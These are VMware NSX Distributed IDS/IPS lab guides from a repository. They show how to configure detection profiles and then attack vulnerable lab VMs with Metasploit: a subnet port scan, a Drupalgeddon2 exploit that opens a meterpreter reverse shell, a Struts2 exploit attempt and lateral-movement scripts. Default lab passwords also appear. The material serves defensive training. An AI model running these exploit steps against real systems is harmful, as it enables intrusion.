51 | NSX can automatically update its IDS/IPS signatures by checking a cloud-based service. By default, NSX Manager will check once per day, and new signature update versions are published every two weeks (with additional non-scheduled 0-day updates). NSX can also be configured to automatically apply newly updated signatures to all hosts that have IDS enabled.
52 |
53 | **Enable Automated Signature Update propagation**
54 | 1. Under Intrusion Detection Signatures, select **Auto Update new versions (recommended)** in order to propagate the latest signature updates from the cloud to the distributed IDS/IPS instances
55 | 2. Optionally, click **View and Change Versions** and expand one of the signature sets to see what signatures have been added/updated/disabled in this particular release
56 |
57 | > **Note**: if a proxy server is configured for NSX Manager to access the internet, click Proxy Settings and complete the configuration
58 |
59 |
60 | **Create IDS/IPS Profiles**
61 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS/IPS --> Profiles
62 | 2. Click **ADD PROFILE**
63 | 3. Create a Profile with the below parameters. Click Save when done.
64 | * Name **Web-FrontEnd**
65 | * Signatures to Include: **Attack Targets**: **Web Server**
66 |
67 | 
68 |
69 | 4. Create another Profile with the below parameters. Click Save when done.
70 | * Name **Databases**
71 | * Signatures to Include: **Products Affected**: **apache couchdb**
72 |
73 | 
74 | 
75 |
76 | **Create IDS Rules**
77 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS/IPS --> Rules
78 | 2. Click **ADD POLICY**
79 | 3. Create an IDS Policy named **NSX IDPS Evaluation**.
80 | 4. Check the checkbox for the policy you just created and click **ADD RULE**.
81 | 5. Add an IDS Rule with the following parameters
82 | * Name **Web-Tier Policy**
83 | * IDS Profile **Web-FrontEnd**
84 | * Applied to **Web-Tier** (group)
85 | * Mode **Detect Only**
86 | * Leave other settings to defaults
87 | 6. Add another IDS Rule with the following parameters
88 | * Name **App-Tier Policy**
89 | * IDS Profile **Databases**
90 | * Applied to **App-Tier** (group)
91 | * Mode **Detect Only**
92 | * Leave other settings to defaults
93 | 7. Click **Publish**
94 |
95 | 
96 |
97 | You have now successfully configured the NSX Distributed IDS/IPS! In the next exercise, we will run through a basic attack scenario to confirm intrusion attempts are detected and to get familiar with the NSX IDS/IPS Events view.
98 |
99 | ---
100 |
101 | [***Next Step: 6. Basic Attack Scenario***](6-DetectingASimpleIntrusion.md)
102 |
--------------------------------------------------------------------------------
/3.1/docs/6-DetectingASimpleIntrusion.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | ## 6. Detecting a Simple Intrusion
4 | **Estimated Time to Complete: 30 minutes**
5 |
6 | In this exercise, we will use **Metasploit** to launch a simple exploit against the **Drupal** service running on the **App1-WEB-TIER VM** and confirm the NSX Distributed IDS/IPS was able to detect this exploit attempt.
7 |
8 | 
9 |
10 | **Open a SSH/Console session to the External VM**
11 | 1. If your computer has access to the IP address you've assigned to the **External VM** (10.114.209.151 in my example), open your ssh client and initiate a session to it. Login with the below credentials.
12 | * Username **vmware**
13 | * Password **VMware1!**
14 | 2. **Alternatively**, if your computer does not have access to the **External VM** directly, you can access the VM console from the physical environment vCenter Web-UI.
15 |
16 | **Initiate port-scan against the DMZ Segment**
17 | 1. Type **sudo msfconsole** to launch **Metasploit**. Follow the below steps to initiate a portscan and discover any running services on the **DMZ** subnet. Hit **enter** between every step.
18 | * Type **use auxiliary/scanner/portscan/tcp** to select the portscan module
19 | * Type **set THREADS 50**
20 | * Type **set RHOSTS 192.168.10.0/24** to define the subnet to scan. This should match the **DMZ** subnet
21 | * Type **set PORTS 8080,5984** to define the ports to scan (Drupal and CouchDB servers)
22 | * Type **run**
23 |
24 | ```console
25 | vmware@ubuntu:~$sudo msfconsole
26 |
27 | IIIIII dTb.dTb _.---._
28 | II 4' v 'B .'"".'/|\`.""'.
29 | II 6. .P : .' / | \ `. :
30 | II 'T;. .;P' '.' / | \ `.'
31 | II 'T; ;P' `. / | \ .'
32 | IIIIII 'YvP' `-.__|__.-'
33 |
34 | I love shells --egypt
35 |
36 |
37 | =[ metasploit v5.0.95-dev ]
38 | + -- --=[ 2038 exploits - 1103 auxiliary - 344 post ]
39 | + -- --=[ 562 payloads - 45 encoders - 10 nops ]
40 | + -- --=[ 7 evasion ]
41 |
42 | Metasploit tip: Tired of setting RHOSTS for modules? Try globally setting it with setg RHOSTS x.x.x.x
43 | msf5 > use auxiliary/scanner/portscan/tcp
44 | msf5 auxiliary(scanner/portscan/tcp) > set THREADS 50
45 | THREADS => 50
46 | msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.10.0/24
47 | RHOSTS => 192.168.10.0/24
48 | msf5 auxiliary(scanner/portscan/tcp) > set PORTS 8080,5984
49 | PORTS => 8080,5984
50 | msf5 auxiliary(scanner/portscan/tcp) > run
51 | ```
52 | 2. You should see the below results when the scan completes
53 | ```console
54 | [*] 192.168.10.0/24: - Scanned 28 of 256 hosts (10% complete)
55 | [*] 192.168.10.0/24: - Scanned 52 of 256 hosts (20% complete)
56 | [+] 192.168.10.100: - 192.168.10.100:5984 - TCP OPEN
57 | [+] 192.168.10.100: - 192.168.10.100:8080 - TCP OPEN
58 | [+] 192.168.10.101: - 192.168.10.101:5984 - TCP OPEN
59 | [+] 192.168.10.101: - 192.168.10.101:8080 - TCP OPEN
60 | [*] 192.168.10.0/24: - Scanned 77 of 256 hosts (30% complete)
61 | [*] 192.168.10.0/24: - Scanned 103 of 256 hosts (40% complete)
62 | [*] 192.168.10.0/24: - Scanned 129 of 256 hosts (50% complete)
63 | [*] 192.168.10.0/24: - Scanned 154 of 256 hosts (60% complete)
64 | [*] 192.168.10.0/24: - Scanned 180 of 256 hosts (70% complete)
65 | [*] 192.168.10.0/24: - Scanned 205 of 256 hosts (80% complete)
66 | [*] 192.168.10.0/24: - Scanned 233 of 256 hosts (91% complete)
67 | [*] 192.168.10.0/24: - Scanned 256 of 256 hosts (100% complete)
68 | [*] Auxiliary module execution completed
69 | ```
70 |
71 | > **Note**: To reduce the number of OVAs needed for this PoV, each workload VM deployed runs both a vulnerable **Drupal** and a vulnerable **CouchDB** service
72 |
73 | **Initiate DrupalGeddon2 attack against App1-WEB-TIER VM**
74 |
75 | In order to launch the **Drupalgeddon2** exploit against the **App1-WEB-TIER VM**, you can either manually configure the **Metasploit** module, or edit and run a pre-defined script. If you want to go with the script option, skip to step #3 and continue from there.
76 |
77 | 1. To initiate the attack manually, use the Metasploit console you opened earlier. Follow the below steps to initiate the exploit. Hit **enter** between every step.
78 | * Type **use exploit/unix/webapp/drupal_drupalgeddon2** to select the drupalgeddon2 exploit module
79 | * Type **set RHOST 192.168.10.101** to define the IP address of the victim to attack. The IP address should match the IP address of **App1-WEB-TIER VM**
80 | * Type **set RPORT 8080** to define the port the vulnerable Drupal service runs on.
81 | * Type **exploit** to initiate the exploit attempt
82 | 2. Skip steps #3 and #4, and continue with step #5
83 |
84 | ```console
85 |
86 | msf5 auxiliary(scanner/portscan/tcp) > use exploit/unix/webapp/drupal_drupalgeddon2
87 | [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
88 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOST 192.168.10.101
89 | RHOST => 192.168.10.101
90 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 8080
91 | RPORT => 8080
92 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
93 | ```
94 | 3. If you want to go with the script option instead, run **sudo nano attack1.rc** and type **VMware1!** when asked for the password (a sketch of the file's expected contents is shown after step #4).
95 | * Confirm that the **RHOST** line IP address matches with the IP address of **App1-WEB-TIER VM** you saw in the NSX VM Inventory.
96 | * Change this IP address if needed.
97 | * Save your changes and exit **nano**
98 | 4. Type **sudo ./attack1.sh** to initiate the Metasploit script and Drupalgeddon exploit. Next, go to step #6
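For reference, the resource script is expected to simply automate the same Metasploit commands used in steps #1-2; a hypothetical sketch of its contents (your copy of **attack1.rc** may differ slightly):

```console
# attack1.rc - Metasploit resource script (hypothetical contents)
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOST 192.168.10.101
set RPORT 8080
exploit
```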
99 |
100 | 5. Confirm the vulnerable server was successfully exploited and a **Meterpreter** reverse TCP session was established from **App1-WEB-TIER VM** back to the **External VM**
101 |
102 | ```console
103 | [*] Started reverse TCP handler on 10.114.209.151:4444
104 | [*] Sending stage (38288 bytes) to 192.168.10.101
105 | [*] Meterpreter session 1 opened (10.114.209.151:4444 -> 192.168.10.101:45032) at 2020-07-20 19:37:29 -0500
106 | ```
107 | 6. **Optionally**, you can now interact with the Meterpreter session. For instance, you can run the below commands to gain more information on the exploited **App1-WEB-TIER VM**
108 | * Type **sysinfo** to learn more about the running OS
109 |
110 | ```console
111 | meterpreter > sysinfo
112 | Computer : 273e1700c5be
113 | OS : Linux 273e1700c5be 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64
114 | Meterpreter : php/linux
115 | meterpreter > ?
116 | ```
117 | 7. When you are done, type **exit -z** to shut down the Meterpreter session
118 | 8. Type **exit** to exit Metasploit
119 |
120 | **Confirm IDS/IPS Events show up in the NSX Manager UI**
121 | 1. In the NSX Manager UI, navigate to Security --> Security Overview
122 | 2. Under the **Insights** tab, confirm you see a number of attempted intrusions against the **APP-1-WEB-TIER** workload
123 | 
124 | 3. Click **APP-1-WEB-TIER** to open a filtered event view for this workload.
125 | 4. Confirm 2 signatures have fired: one exploit-specific signature for **DrupalGeddon2** and one broad signature indicating the use of **Remote Code Execution via a PHP script**
126 | 
127 | > **Note**: You can zoom in/out to specific times using the timeline slider, filter the Events view based on Severity by selecting the desired severities, or filter based on other criteria such as Attack Target, Attack Type, CVSS, Product Affected or VM Name by using the **Apply Filter** box.
128 | 5. Expand both of the events by clicking the **>** icon on the left side next to severity
129 | 6. For the **DrupalGeddon2** event:
130 | * Confirm that the IP addresses of the attacker and victim match the **External VM** and **APP-1-WEB-TIER VM** respectively.
131 | * Click the **Purple Bar (Detected Only)** to see details about the exploit attempts. You may see multiple attempts (from different ports) as Metasploit initiated multiple connections
132 | * This event contains vulnerability details, including the **CVSS score** and **CVE ID**. Click the **2018-7600** CVE link to open up the **MITRE** CVE page and learn more about the vulnerability.
133 | 7. **Optionally**, you can check the above details as well for the secondary event (except for the vulnerability details, which are not applicable to this more general signature)
134 |
135 | > **Note**: **Product Affected** indicates the service vulnerable to the exploit a signature detects. In this case, you should see **Drupal_Server** as being vulnerable to the **DrupalGeddon2** exploit and **Web_server_Applications** being affected by the more generic **Remote Code Execution** attempt.
136 |
137 | > **Note**: **Attack Target** indicates the kind of service being attacked. This could be a client (in the case of a client-side exploit), a server, etc. In this case, you should see **Web_server** as the attack target for both events.
138 |
139 | 8. In the **timeline** above, you can click the dots that represent each event to get summarized information.
140 |
141 | You have now successfully completed a simple attack scenario!
142 | In the next exercise, we will run through a more advanced scenario, in which we will move the attack beyond the initial exploit against the Drupal web-frontend to a database server running on the internal network, and then move laterally once again to another database server belonging to a different application. This is similar to real-world attacks, in which bad actors move within the network in order to get to the high-value assets/data they are after. The NSX Distributed IDS/IPS and Distributed Firewall are uniquely positioned at the vNIC of every workload to detect and prevent this lateral movement.
143 |
144 |
145 | Before moving to the next exercise, follow [these instructions](ClearingIDSEvents.md) to clear the IDS events from NSX Manager
146 |
147 | ---
148 |
149 | [***Next Step: 7. Lateral Movement Scenario***](7-DetectinganAdvancedAttack.md)
150 |
--------------------------------------------------------------------------------
/3.1/docs/8-AdvancedConfiguration-302.md:
--------------------------------------------------------------------------------
1 |
2 | ## 8. Advanced Attack and Configuration
3 | **Estimated Time to Complete: 60 minutes**
4 |
5 | In this **optional** exercise, we will explore some more advanced options in the NSX Distributed IDS/IPS configuration:
6 | * Tuning IDS/IPS Profile to turn off irrelevant signatures
7 | * Enable IDS/IPS event logging directly from each host to a syslog collector/SIEM
8 |
9 | **Tuning IDS/IPS Profile to turn off irrelevant signatures**
10 |
11 | > **Note**: Within an IDS/IPS Profile, you can define exclusions in order to turn off particular signatures within the context of that profile. Reasons to exclude a signature include false positives and noisy or irrelevant signatures being triggered.
12 |
13 | 1. From the console session with **External VM**, type **sudo msfconsole** to launch **Metasploit**. Enter **VMware1!** if prompted for a password. Follow the below steps to initiate the exploit. Hit **enter** between every step.
14 | * Type **use exploit/multi/http/struts2_content_type_ognl** to select the Apache Struts exploit module
15 | * Type **set RHOST 192.168.10.101** to define the IP address of the victim to attack. The IP address should match the IP address of **App1-WEB-TIER VM**
16 | * Type **exploit** to initiate the exploit.
17 |
18 | > **Note**: This exploit will fail as **App1-WEB-TIER VM** is not running an Apache Struts service vulnerable to this exploit.
19 |
20 | ```console
21 | msf5 > use exploit/multi/http/struts2_content_type_ognl
22 | [*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
23 | msf5 exploit(multi/http/struts2_content_type_ognl) > set RHOST 192.168.10.101
24 | RHOST => 192.168.10.101
27 | msf5 exploit(multi/http/struts2_content_type_ognl) > exploit
28 |
29 | [*] Started reverse TCP handler on 10.114.209.151:4444
30 | [-] Exploit aborted due to failure: bad-config: Server returned HTTP 404, please double check TARGETURI
31 | [*] Exploit completed, but no session was created.
32 | msf5 exploit(multi/http/struts2_content_type_ognl) >
33 | ```
34 | 2. In NSX Manager, navigate to Security --> East West Security --> Distributed IDS --> Events
35 | 3. Confirm 3 signatures have fired:
36 | * ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638)
37 | * ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M2
38 | * ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M3
39 | 
40 | 4. Note that the **affected product** for all these events is **Apache_Struts2** and the severity for all events is **high**.
41 | 5. Now we will turn off these signatures for the **Production** profile, as we are not running **Apache_Struts2** in our production environment.
42 | 6. In NSX Manager, navigate to Security --> East West Security --> Distributed IDS --> Profiles
43 | 7. Click the **3 dots** next to the **Production** profile and click **Edit** to edit the profile.
44 | 8. Click **Select** next to **High Severity Signatures**
45 | 9. In the **Filter** field, type **Apache_Struts2** to find all signatures related to Struts2. Tick the **Checkbox** on top of the exclusion screen to select all filtered signatures.
46 | 
47 | 10. Click **Add** to add the selected signatures to the exclusion list for the **Production** profile.
48 | 11. Click **Save** to save the **Production** profile.
49 |
50 | Now that we have tuned our Profile, we will try the failed exploit attempt again, and confirm this time the signatures don't fire.
51 |
52 | 12. From the already open console session with **External VM**, use the already configured **struts2_content_type_ognl** Metasploit module to launch the exploit attempt again.
53 | * Type **exploit** to initiate the exploit. If you had previously closed Metasploit, then repeat step #1 of this exercise instead to launch the exploit attempt
54 | 13. In NSX Manager, navigate to Security --> East West Security --> Distributed IDS --> Events
55 | 14. Confirm the total number of events or the number of times each **Apache_Struts2** signature fired has not increased.
56 | 
57 | 15. You have now completed this exercise.
58 |
59 | **Enable IDS/IPS event logging directly from each host to a syslog collector/SIEM**
60 |
61 | > **Note**: In addition to IDS/IPS events being reported to NSX Manager by each distributed IDS/IPS engine, each host can send events directly to a syslog collector or SIEM. Events are sent in the EVE.JSON format, for which many SIEMs have pre-existing parsers/dashboards.
62 |
63 | In this exercise, you will learn how to configure IDS event export from each host to your syslog collector or SIEM of choice. I will use **vRealize Log Insight**. You can use the same or your own SIEM of choice.
64 | We will not cover how to install **vRealize Log Insight** or any other logging platform, but the following steps will cover how to send IDS/IPS events to an already configured collector.
65 |
66 | 1. Login to lab vCenter and click on **Hosts and Clusters**, then select one of the 3 hosts that were deployed.
67 | 2. Click the **Configure** Tab and Scroll down to **System**. Click **Advanced System Settings**
68 | 3. Click the **Edit** button
69 | 4. In the **Filter** field, type **loghost**
70 | 5. Enter the **IP address of your syslog server** in the **Syslog.global.logHost** value field and click **OK** to confirm.
71 | 
72 | 6. Repeat the same for the remaining 2 hosts.
73 | 7. Click on **Firewall** in the same **System** menu
74 | 8. Click the **Edit** button
75 | 9. In the **Filter** field, type **syslog**
76 | 10. Tick the checkbox next to **syslog** to allow outbound syslog from the host.
77 | 11. Repeat the same for the remaining 2 hosts.
78 | 
79 | 12. Open a terminal session to one of the lab hypervisors, login with **root**/**VMware1!** and execute the below commands to enable IDS log export via syslog
80 | * Type **nsxcli** to enter the NSX CLI on the host
81 | * Type **set ids engine syslogstatus enable** to enable syslog event export
82 | * Confirm syslog event export was successfully enabled by running the command **get ids engine syslogstatus**
83 |
84 | ```console
85 | [root@localhost:~] nsxcli
86 | localhost> set ids engine syslogstatus enable
87 | result: success
88 |
89 | localhost> get ids engine syslogstatus
90 | NSX IDS Engine Syslog Status Setting
91 | --------------------------------------------------
92 | true
93 | ```
94 | 13. Login to your syslog collector/SIEM and confirm you are receiving logs from each host.
95 | 14. Configure a parser or a filter to only look at IDS events. You can, for example, filter on the string **IDPS_EVT**.
96 | 
97 | 15. Now we will run the lateral attack scenario we used in an earlier exercise again. This time, use the pre-defined script to run the attack instead of manually configuring the **Metasploit** modules.
98 | 16. Before you execute the script, if you have not previously used it, you need to ensure the IP addresses match your environment. Type **sudo nano attack2.rc** and replace the **RHOST** and **LHOST** IP addresses accordingly to match the IP addresses in your environment.
99 | * **RHOST** on line 3 should be the IP address of the App1-WEB-TIER VM
100 | * **SUBNET** on line 6 (route add) should be the Internal Network subnet
101 | * **LHOST** on line 9 should be the IP address of the External VM (this local machine)
102 | * **RHOST** on line 10 should be the IP address of the App1-APP-TIER VM, and **RHOST** on line 13 should be the IP address of the App2-APP-TIER VM
103 | 17. After saving your changes, run the attack2 script by executing **sudo ./attack2.sh**.
104 | 18. Confirm a total of 3 meterpreter/command shell sessions have been established
105 | 19. Confirm your syslog server/SIEM has received the IDS events, directly from the host
106 | 
107 |
108 | This completes this exercise.
109 |
110 | ---
111 |
112 | [***Next Step: 9. Segmentation***](/docs/9-Segmentation.md)
113 |
--------------------------------------------------------------------------------
/3.1/docs/8-PreventinganAttack.md:
--------------------------------------------------------------------------------
1 |
2 | ## 8. Preventing an Attack
3 | **Estimated Time to Complete: 30 minutes**
4 |
5 | In this exercise, we will show how the NSX Distributed IDS/IPS can not just detect but also prevent an attack. We will run the same attack scenario as before.
6 |
7 | **Tune the Web-FrontEnd Profile**
8 |
9 | In order to prevent an attack, we need to both change the mode in our IDS/IPS rule(s) to **detect and prevent** and ensure that relevant signature actions are set to either **drop** or **reject**.
10 | The default VMware-recommended signature action can be overridden both at the global level and within a profile. For the purpose of this lab, we will make the modification within the profile.
11 | Besides changing the signature action, you can also disable signatures at the global or per-profile level, which may be needed in case of false positives.
12 |
13 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS/IPS --> Profiles
14 | 2. Click the 3 dots icon next to the **Web-FrontEnd** profile and then click **Edit**.
15 | 3. Click **Manage signatures for this profile**.
16 | 4. In the Filter field, select **Product Affected**, type **drupal_drupal**, and click **Apply** to only show the signatures related to Drupal.
17 |
18 | 
19 |
20 | 5. You should see a filtered list with 4 signatures (the number may differ if you have a different signature package version deployed).
21 | 6. For each of the signatures displayed, set the Action to **Drop** or **Reject**. Click **Apply** to confirm.
22 |
23 | 
24 |
26 | 7. Click **SAVE** to save the changes to the **Web-FrontEnd** profile.
26 |
27 | **Tune the Databases Profile**
28 |
29 | Now we will also set the action for signatures related to **CouchDB** in the **Databases** profile to **Drop**.
30 |
31 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS/IPS --> Profiles
32 | 2. Click the 3 dots icon next to the **Databases** profile and then click **Edit**.
33 | 3. Click **Manage signatures for this profile**.
34 | 4. You should see a filtered list with 7 signatures (the number may differ if you have a different signature package version deployed).
35 | 5. Click the selection box on top to select all signatures.
36 | 6. Click the **ACTION** button on top and choose **Drop** to change the action for all selected signatures to **Drop**. Click **Apply** to confirm.
37 | 7. Click **SAVE** to save the changes to the **Databases** profile.
38 |
39 | **Change the IDS/IPS Mode to Detect & Prevent**
40 |
41 | For each IDS/IPS Rule, you can set the mode to **Detect Only** or **Detect & Prevent**. This mode effectively limits the action that can be taken: when deployed in **Detect Only** mode, the only action taken when a signature is triggered is generating an **Alert**, regardless of the action set for the signature. In **Detect & Prevent** mode, on the other hand, the action set on each signature is applied.
42 |
43 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS/IPS --> Rules
44 | 2. Click the **>** icon to expand the **NSX IDPS Evaluation** Policy.
45 | 3. For both the **App-Tier Policy** and **Web-Tier Policy** rule, change the mode from **Detect Only** to **Detect & Prevent**.
46 |
47 | 
48 |
49 | 4. Click **PUBLISH** to commit the changes.
50 |
51 | **Open a SSH/Console session to the External VM**
52 | 1. If your computer has access to the IP address you've assigned to the **External VM** (10.114.209.151 in my example), open your ssh client and initiate a session to it. Login with the below credentials.
53 | * Username **vmware**
54 | * Password **VMware1!**
55 | 2. **Alternatively**, if your computer does not have access to the **External VM** directly, you can access the VM console from the physical environment vCenter Web-UI.
56 |
57 | **Initiate DrupalGeddon2 attack against the App1-WEB-TIER VM (again)**
58 | 1. Type **sudo msfconsole** to launch **Metasploit**. Enter **VMware1!** if prompted for a password. Follow the below steps to initiate the exploit. Hit **enter** between every step.
59 | * Type **use exploit/unix/webapp/drupal_drupalgeddon2** to select the drupalgeddon2 exploit module
60 | * Type **set RHOST 192.168.10.101** to define the IP address of the victim to attack. The IP address should match the IP address of **App1-WEB-TIER VM**
61 | * Type **set RPORT 8080** to define the port the vulnerable Drupal service runs on.
62 | * Type **exploit** to initiate the exploit and attempt to establish a reverse shell
63 |
64 | 2. Confirm that, as a **detect & prevent** policy is applied to the WEB-TIER VMs, the exploit attempt was prevented and no meterpreter session was established. Because the initial exploit was not successful, lateral movement to the internal segment is also prevented.
65 |
66 | ```console
67 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > use exploit/unix/webapp/drupal_drupalgeddon2
68 | [*] Using configured payload php/meterpreter/reverse_tcp
69 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOST 192.168.10.101
70 | RHOST => 192.168.10.101
71 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 8080
72 | RPORT => 8080
73 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
74 |
75 | [*] Started reverse TCP handler on 10.114.209.151:4444
76 | [*] Exploit completed, but no session was created.
77 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) >
78 |
79 | ```
80 | **Confirm IDS/IPS Events show up in the NSX Manager UI**
81 | 1. In the NSX Manager UI, navigate to Security --> Security Overview
82 | 2. Under the **Insights** tab, confirm you see a number of attempted intrusion against the **APP-1-WEB-TIER** workload
83 | 
84 | 3. Navigate to Security --> Distributed IDS/IPS --> Events
85 | 4. Confirm 2 signatures have fired:
86 | * Signature for **DrupalGeddon2**, with **APP-1-WEB-TIER** as Affected VM
87 | * Signature for **Remote Code execution via a PHP script**, with **APP-1-WEB-TIER** as Affected VM
88 |
89 | 
90 |
91 | 5. Now you can drill down into these events. Click the **>** symbol to the left of the **ET WEB_SPECIFIC_APPS [PT OPEN] Drupalgeddon2 <8.3.9 <8.4.6 <8.5.1 RCE Through Registration Form (CVE-2018-7600)** event near the bottom of the table to expand this event.
92 | * Confirm that the IP addresses of the attacker and victim match the **External VM** and **APP-1-WEB-TIER VM** respectively.
93 | * Click the **green bar (Prevented)** to see details about the exploit attempts. You may see multiple attempts (from different ports) as Metasploit initiated multiple connections
94 |
95 | 
96 |
97 | You have now successfully prevented the initial exploit and further lateral movement.
98 | This completes this exercise and the lab. You may continue with some optional exercises or read the conclusion (see the links below).
99 |
100 | Before moving to the next exercise, follow [these instructions](ClearingIDSEvents.md) to clear the IDS events from NSX Manager
103 |
104 | ---
105 |
106 | [***Next Step : (Optional) 9. Logging to an external collector***](9-Logging.md)
107 |
108 | [***Next Step : (Optional) 10. Segmenting the Environment***](10-Segmentation.md)
109 |
110 | [***Next Step : 11. Conclusion***](11-Conclusion.md)
111 |
112 |
113 |
--------------------------------------------------------------------------------
/3.1/docs/9-Logging.md:
--------------------------------------------------------------------------------
1 |
2 | ## 9. Logging to an External Collector
3 | **Estimated Time to Complete: 30 minutes**
4 |
5 | In this **optional** exercise, we will configure the NSX Distributed IDS/IPS to send events to an external syslog collector/SIEM
6 |
7 | **IMPORTANT**: Prior to this exercise, change the **Mode** for both the **App-Tier** and **Web-Tier** IDS/IPS policy back to **Detect Only**.
8 |
9 |
10 | **Enable IDS/IPS event logging directly from each host to a syslog collector/SIEM**
11 |
12 | > **Note**: In addition to IDS/IPS events being reported to NSX Manager by each distributed IDS/IPS engine, each host can send events directly to a syslog collector or SIEM. Events are sent in the EVE.JSON format, for which many SIEMs have pre-existing parsers/dashboards.
13 |
14 | In this exercise, you will learn how to configure IDS event export from each host to your syslog collector or SIEM of choice. I will use **vRealize Log Insight**. You can use the same or your own SIEM of choice.
15 | We will not cover how to install **vRealize Log Insight** or any other logging platform, but the following steps will cover how to send IDS/IPS events to an already configured collector.
16 |
17 | 1. Login to lab vCenter and click on **Hosts and Clusters**, then select one of the 3 hosts that were deployed.
18 | 2. Click the **Configure** Tab and Scroll down to **System**. Click **Advanced System Settings**
19 | 3. Click the **Edit** button
20 | 4. In the **Filter** field, type **loghost**
21 | 5. Enter the **IP address of your syslog server** in the **Syslog.global.logHost** value field and click **OK** to confirm.
22 | 
23 | 6. Repeat the same for the remaining 2 hosts.
24 | 7. Click on **Firewall** in the same **System** menu
25 | 8. Click the **Edit** button
26 | 9. In the **Filter** field, type **syslog**
27 | 10. Tick the checkbox next to **syslog** to allow outbound syslog from the host.
28 | 11. Repeat the same for the remaining 2 hosts.
29 | 
30 | 12. Open Postman or another API tool and execute the below API GET call to NSX Manager to retrieve the current syslog configuration. Note the **Revision** number from the API return body.
31 | * URI: https://10.114.222.108/api/v1/global-configs/IdsGlobalConfig (replace IP address with the IP address of your NSX Manager)
32 | * Method: GET
33 | * Authentication: Basic (enter username/password)
34 | 13. Now run a PUT call to enable syslog (curl equivalents for both calls are sketched below)
35 | * URI: https://10.114.222.108/api/v1/global-configs/IdsGlobalConfig (replace IP address with the IP address of your NSX Manager)
36 | * Method: PUT
37 | * Authentication: Basic (enter username/password)
38 | * Body:
39 | ```console
40 | {
41 | "global_idsevents_to_syslog_enabled": true,
42 | "resource_type": "IdsGlobalConfig",
43 | "_revision": 36 (change this to the revision number from the get call)
44 | }
45 | ```
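If you prefer the command line over Postman, the two calls might look like the below sketch with curl (replace the NSX Manager address with your own, authenticate as an NSX admin user, and substitute the **_revision** value returned by the GET call):

```console
# Retrieve the current config and note the "_revision" value in the response
curl -k -u admin "https://10.114.222.108/api/v1/global-configs/IdsGlobalConfig"

# Enable syslog export of IDS events, echoing back the retrieved revision number
curl -k -u admin -X PUT -H "Content-Type: application/json" \
  -d '{"global_idsevents_to_syslog_enabled": true, "resource_type": "IdsGlobalConfig", "_revision": 36}' \
  "https://10.114.222.108/api/v1/global-configs/IdsGlobalConfig"
```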
46 | 
47 |
48 | 14. Login to your syslog collector/SIEM and confirm you are receiving logs from each host.
49 | 15. Configure a parser or a filter to only look at IDS events. You can, for example, filter on the string **IDPS_EVT**.
50 | 
51 | 16. Now we will run the lateral attack scenario we used in an earlier exercise again. This time, use the pre-defined script to run the attack instead of manually configuring the **Metasploit** modules.
52 | 17. Before you execute the script, if you have not previously used it, you need to ensure the IP addresses match your environment. Type **sudo nano attack2.rc** and replace the **RHOST** and **LHOST** IP addresses accordingly to match the IP addresses in your environment.
53 | * **RHOST** on line 3 should be the IP address of the App1-WEB-TIER VM
54 | * **SUBNET** on line 6 (route add) should be the Internal Network subnet
55 | * **LHOST** on line 9 should be the IP address of the External VM (this local machine)
56 | * **RHOST** on line 10 should be the IP address of the App1-APP-TIER VM, and **RHOST** on line 13 should be the IP address of the App2-APP-TIER VM
57 | 18. After saving your changes, run the attack2 script by executing **sudo ./attack2.sh**.
58 | 19. Confirm a total of 3 meterpreter/command shell sessions have been established
59 | 20. Confirm your syslog server/SIEM has received the IDS events, directly from the host
60 | 
61 |
62 | This completes this exercise. Before moving to the next exercise, follow [these instructions](/docs/ClearingIDSEvents.md) to clear the IDS events from NSX Manager
63 |
64 | ---
65 |
66 | [***Next Step : (Optional) 10. Segmenting the Environment***](10-Segmentation.md)
67 |
--------------------------------------------------------------------------------
/3.1/docs/ClearingIDSEvents.md:
--------------------------------------------------------------------------------
1 |
2 | ## Clearing IDS Events from NSX Manager
3 | **For purposes of a demo or PoV, the below describes how IDS events can be cleared from NSX Manager**
4 |
5 |
6 |
7 | 1. Open your ssh client and initiate a session to NSX Manager. Login with the below credentials.
8 | * Username **root**
9 | * Password **VMware1!VMware1!**
10 | 2. Modify the **IP address (--host=10.114.209.149) in the below command to match the IP address of your NSX Manager**. Other values should not be changed
11 | ```console
12 | service idps-reporting-service stop
13 | java -cp /usr/share/corfu/lib/corfudb-tools-3.1.20201022192550.7817.1-shaded.jar org.corfudb.browser.CorfuStoreBrowserMain --host=10.114.209.149 --port=9040 --tlsEnabled=true --keystore=/config/cluster-manager/corfu/private/keystore.jks --ks_password=/config/cluster-manager/corfu/private/keystore.password --truststore=/config/cluster-manager/corfu/public/truststore.jks --truststore_password=/config/cluster-manager/corfu/public/truststore.password --namespace=security_data_service --tablename=ids_event_data --operation=dropTable --diskPath=/tmp
14 | curl -X PUT -H "Content-Type: application/json" "localhost:9200/security_data_service_metadata/_doc/security_data_service?pretty" -d' {"clusterId" : "-1"}'
15 | service idps-reporting-service start
16 | ```
17 | 3. IDS events will now be cleared from NSX Manager and the reporting service will restart. This may take a few moments, but when you login to the NSX Manager UI, you should see the IDS events have been removed. You may have to refresh the UI/webpage a few times. You can now close the ssh session.
18 | ---
19 |
20 | ***Next Step: Continue with the next exercise in the PoV Guide***
21 |
--------------------------------------------------------------------------------
/3.1/docs/assets/images/IDPS_POC_1.PNG:
--------------------------------------------------------------------------------
